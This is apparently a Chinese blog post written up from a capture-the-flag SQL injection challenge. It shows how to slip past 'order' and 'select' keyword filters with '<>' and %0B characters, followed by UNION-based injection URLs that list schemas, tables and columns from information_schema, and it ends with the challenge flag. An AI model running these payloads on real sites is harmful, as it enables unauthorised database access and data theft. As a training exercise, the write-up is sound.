SQL

2019-06-02 本文已影响0人 Yix1a

-1 # 发现成功了

用ord<>er by 3和4测试，3成功。
用union sele<>ct 1,2,3 出2

/index.php?id=0%0Bunion%0Bsele<>ct%0B1,group_concat(schema_name),3%0Bfrom%0Binformation_schema.schemata 
information_schema,sqli


/index.php?id=0%0Bunion%0Bsele<>ct%0B1,group_concat(table_name),3%0Bfrom%0Binformation_schema.tables%0bwhere%0btable_schema='sqli' 
info,users


/i  ndex.php?id=0%0Bunion%0Bsele<>ct%0B1,group_concat(column_name),3%0Bfrom%0Binformation_schema.columns%0bwhere%0btable_name='info'  
info 表： id,title,flAg_T5ZNdrm

/index.php?id=0%0Bunion%0Bsele<>ct%0B1,group_concat(column_name),3%0Bfrom%0Binformation_schema.columns%0bwhere%0btable_name='users'  

users表;id,username,flag_9c861b688330


flAg_T5ZNdrm  flag{7d5d2ba8-34ba-46a9-85eb-b79c0a9e8007},test

注意观察怎么绕过order select过滤

SQL

猜你喜欢

热点阅读